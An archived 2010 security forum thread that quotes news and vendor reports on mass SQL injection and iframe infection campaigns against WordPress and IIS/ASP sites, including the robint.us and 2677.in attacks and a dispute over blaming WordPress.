View Full Version : Thousands of sites infected...

2010-02-23, 17:46

Automated SQL injection attacks...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=223100129
Feb. 22, 2010 - "SQL injections top plenty of lists as the most prevalent means of attacking front-end Web applications and back-end databases to compromise data... analysis of the Web Hacking Incidents Database* (WHID) shows SQL injections as the top attack vector, making up 19 percent of all security breaches examined by WHID. Similarly, in the "Breach Report for 2010" (PDF) released by 7Safe* earlier this month, a whopping 60 percent of all breach incidents examined involved SQL injections... criminals are increasingly using automated SQL injection attacks powered by botnets to hit vulnerable systems... the purpose of those attacks is really to inject JavaScript redirectors into Web pages so that legitimate Web pages end up redirecting their users to exploit toolkits..."
* http://webappsec.pbworks.com/Web-Hacking-Incident-Database

** http://7safe.com/breach_report/Breach_report_2010.pdf


2010-03-10, 04:09

WordPress injection attack
- http://securitylabs.websense.com/content/Blogs/3577.aspx
03.09.2010 - "... Websense... has been monitoring the latest WordPress injection attack for over 2 weeks and has found over 250,000 injections occurring in the past half month. Moreover, over 37,000 URLs in the wild are still being injected according to our observations... the daily stats go up and down a few times and always end up higher, so we believe the hackers are still continuing their attack... WordPress is so widely used all over the world that every version of it is studied and exploited by hackers, even the latest version (2.9.2, released on December 18, 2009)... The ultimate purpose of the attack is all about making money, as Sophos has already investigated*... These attacks probably happened due to SQL injection via some known and unknown WordPress vulnerabilities... Injection is not the only way for hackers to utilize those vulnerabilities; compromising a site is also a good option. It has often been reported that compromised Web sites are used for Blackhat SEO to push rogue AVs. Novirusthanks has a great analysis here**, and more investigation indicates that the compromise behind the attack is connected to WordPress vulnerabilities... WordPress users should be very familiar with the injection or compromise attack since it has been used frequently in the past. Although WordPress has 2-3 releases every year and has 3 releases planned this year as usual, it has proved to be not enough: we still can see many victimized sites with the latest 2.9.2 installation..."

(More detail and screenshots available at the Websense URL above.)

* http://www.sophos.com/blogs/sophoslabs/?p=8498

** http://blog.novirusthanks.org/2009/11/more-than-100-websites-compromised-for-blackhat-seo-strategy/


2010-06-09, 23:03

Mass Infection of IIS/ASP Sites
- http://isc.sans.edu/diary.html?storyid=8935
Last Updated: 2010-06-09 19:01:51 UTC - "Sucuri.net has released a report about a large number of sites that have been hacked and contain a malware script. A quick Google today indicates that there are currently 111,000 sites still infected. It appears that this is only impacting websites hosted on Windows servers. The situation is being investigated. For those who are hosting there websites on Windows IIS/ASP you may find more information here:
- http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
June 8, 2010 - "... sites have been hacked in the last day with a malware script pointing to
http ://ww.robint .us/u.js. Not only small sites, but some big ones got hit as well..."

- http://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.html

Update: Paul at Sophos logs has released some additional information regarding this exploit and Infection. Thanks Paul.
- http://www.sophos.com/blogs/sophoslabs/?p=9941

SQL injection attacks...
- http://www.theregister.co.uk/2010/06/09/mass_webpage_attack/
9 June 2010 - "... Robint.us has been disabled, thanks to a sinkholing effort carried out by volunteer security outfit Shadowserver Foundation. The action will allow Shadowserver researchers to get a complete list of compromised sites and to gather additional information about how the attack was carried out..."

Shadowserver Sinkholing domain associated with SQLi attacks on IIS/ASP web servers
- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20100609
9 June 2010

- http://blog.scansafe.com/journal/2010/6/8/robintus-a-poster-child-for-repeat-injections.html
June 8, 2010


2010-06-12, 04:13

Adobe 0-day used - mass injections
- http://community.websense.com/blogs/securitylabs/archive/2010/06/11/adobe-0-day-used-in-mass-injections.aspx
11 Jun 2010 05:38 PM - "... we started seeing mass injections... The attack is closely related to the hxxp ://ww.robint .us/[REMOVED].js attack earlier this week... common theme was that all Web sites were running on Microsoft IIS and used ASP.NET. In fact, the majority of sites compromised by the -new- mass injection attack still have the robint.us code present... Adobe released a patch* for this vulnerability yesterday and we advise all users to download it immediately... Once for IE and a second time for all other browsers."

(Screenshots and video available at the Websense URL above.)

Flash v10.1.53.64 update
* http://forums.spybot.info/showpost.php?p=374070&postcount=52

- http://www.theregister.co.uk/2010/06/11/mass_webpage_attack/
11 June 2010 - "... The latest SQL injection attack pulls down a malicious javascript from 2677.in, which according to anti-virus firm Symantec*, downloads a serious threat dubbed “HTTP Microsoft IE Generic Heap Spray BO.” 2677.in was still active at time of writing..."
* http://safeweb.norton.com/report/show?name=2677.in

- http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-2677-inyahoo-js.html
June 11, 2010

- http://google.com/safebrowsing/diagnostic?site=2677.in/
"... The last time Google visited this site was on 2010-06-13, and the last time suspicious content was found on this site was on 2010-06-13. Malicious software includes 8 scripting exploit(s), 1 trojan(s), 1 exploit(s)... this site has hosted malicious software over the past 90 days. It infected 185 domain(s)..."

- http://ddanchev.blogspot.com/2010/06/facebook-photo-album-themed-malware.html
June 15, 2010 - "... Where's the mass SQL injection attack connection? Within AS42560*... part of the campaign... Detection rate: - urchin.js - Trojan.JS.Redirector.ca (v); JS:Downloader-LP - Result: 4/41 (9.76%)... AS49087, Telos-Solutions-AS..."
* http://stopbadware.org/reports/asn/42560
AS 42560 - BA-GLOBALNET-AS GlobalNET Bosnia
** http://stopbadware.org/reports/asn/49087
AS 49087 - TELOS-SOLUTIONS-AS Telos Solutions LTD

- http://blog.webroot.com/2010/06/14/facebook-photo-album-spam-drops-trojans/
June 14, 2010


2010-08-24, 22:23

Mass infection of websites
- http://techblog.avira.com/2010/08/24/mass-infection-of-websites/en/
August 24, 2010 - "Drive-by-downloads that use exploits to infect the visitor of a website are a very popular distribution method for malware authors. In the last days we detected thousands of websites which are infected with a hidden, invisible iframe. Searching for similar iframe infections shows that Google lists about 47,300 hits. The target server and script this iframe points to are currently offline; the injection scripts of the malware authors may be inactive at present. Some of these infected sites had a more than one iframe injected into them though. They were infected with three or more scripts which all point to Russian servers. This looks like a mass infection of websites which are created with a certain content management system (CMS). Usually, such mass infections are done with so-called SQL injections through security holes in these CMSes. Website administrators should always take care to have the latest version of their CMS and the needed scripting languages like PHP and Perl installed so that such mass SQL injections donít have a chance. The malware authors didnít take the effort to properly track their infections, as the observation of multiple injections with the same iframe show..."


2010-11-22, 20:47

Websense in error blaming WordPress ...
- http://www.whitefirdesign.com/news/2010/11/15/websense-threat-report-repeats-false-claims-of-wordpress-hackings/
November 15, 2010 - "In Websenseís 2010 Threat Report they listed WordPress Attacks as one of the significant events of the year**... The hacks they refer to were actually hacks that targeted hosting providers that would allow malicious code to be added to websites hosted with the provider whether they were running WordPress, other software, or no software at all. In most of the hacks the malicious code was placed in all files that had a .php extension. WordPress, by the nature of being the most popular web software, was the most of often affected, but all web software that have files with a .php extension were also affected. In other cases the hacks targeted database fields specific to WordPress, but they could have affected any other software that utilized a database if the hacker had chose to target them instead of WordPress. Websense is not alone is making these false claims, other supposed security experts also made similar claims and some hosting provider have attempted to lame blame on WordPress. Network Solutions was the only one to later apologize for blaming WordPress...*"
* http://blog.networksolutions.com/2010/wordpress-is-not-the-issue/

** http://www.websense.com/content/threat-report-2010-wordpress.aspx